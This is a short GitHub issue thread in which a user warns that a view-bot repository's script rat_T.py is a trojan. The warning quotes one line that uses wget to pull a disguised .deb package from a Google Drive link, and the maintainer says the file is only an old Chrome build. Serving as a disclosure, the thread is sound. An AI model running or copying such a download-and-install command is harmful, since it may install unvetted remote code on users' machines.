### ISSUE TITLE
ATTENTION Remote Access Trojan = R.A.T aka "rat_T.py"

### ISSUE THREAD

**Issue by derekmaclingster** [adnangif/viewbot#1]
Nice try
run('wget -c https://docs.google.com/uc?id=1L1N_Bx77plgiWzfnQ-wGhW0W29fYS7pn -O chrome64_61.deb',shell=True)

creating a botnet  Trojan

**Comment by ElectroGamesDev** [comment]
LMAO

**Comment by adnangif** [comment]
sorry but that is just a chrome version 61.
go ahead and open the link in your browser you will find out. I had to work around (navigate.webdriver) constant variable everytime I open a new window with selenium that was being passed to the website. so I had no choice but to use an early version. 
But you can go ahead use the latest version. I used rat_T.py for farming in cloud so that I didn't have to type everything everytime and didn't have time to edit this script.  so I uploaded the raw code.
I thought I would be a good Idea
.
